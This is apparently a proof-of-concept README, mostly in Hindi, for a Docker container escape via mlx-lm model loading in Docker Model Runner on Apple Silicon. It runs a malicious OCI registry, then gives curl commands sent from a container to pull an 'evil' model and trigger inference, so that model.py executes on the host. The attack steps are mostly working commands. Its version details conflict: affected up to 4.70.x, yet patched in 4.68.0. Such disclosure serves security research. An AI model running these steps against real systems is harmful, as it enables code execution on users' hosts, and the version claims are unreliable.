
mlx-metal importlib के माध्यम से Docker कंटेनर एस्केप POC
न्यूनतम OCI रजिस्ट्री जो mlx-lm में model_file importlib निष्पादन पथ का शोषण करने के लिए एक दुर्भावनापूर्ण मॉडल परोसती है। जब Docker Model Runner अनुमान के लिए मॉडल लोड करता है, model.py होस्ट पर लॉग-इन किए गए उपयोक्ता के रूप में निष्पादित होता है।
आवश्यक है: Docker Desktop ≤ 4.70.x (Apple Silicon) और Model Runner सक्षम होना चाहिए
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py
# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh
curl -X POST http://model-runner.docker.internal/api/pull \
-H 'Content-Type: application/json' \
-d '{"name":"localhost:5555/evil/model:latest"}'
curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
-H 'Content-Type: application/json' \
-d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'
आउटपुट होस्ट पर ~/Desktop/mlx.txt में लिखा जाता है।
पूरा विवरण: https://davidrochester.com/posts/container-escape-via-inference
trust_remote_code=True, समान हमला सतह, Docker Desktop 4.68.0 में पैच किया गया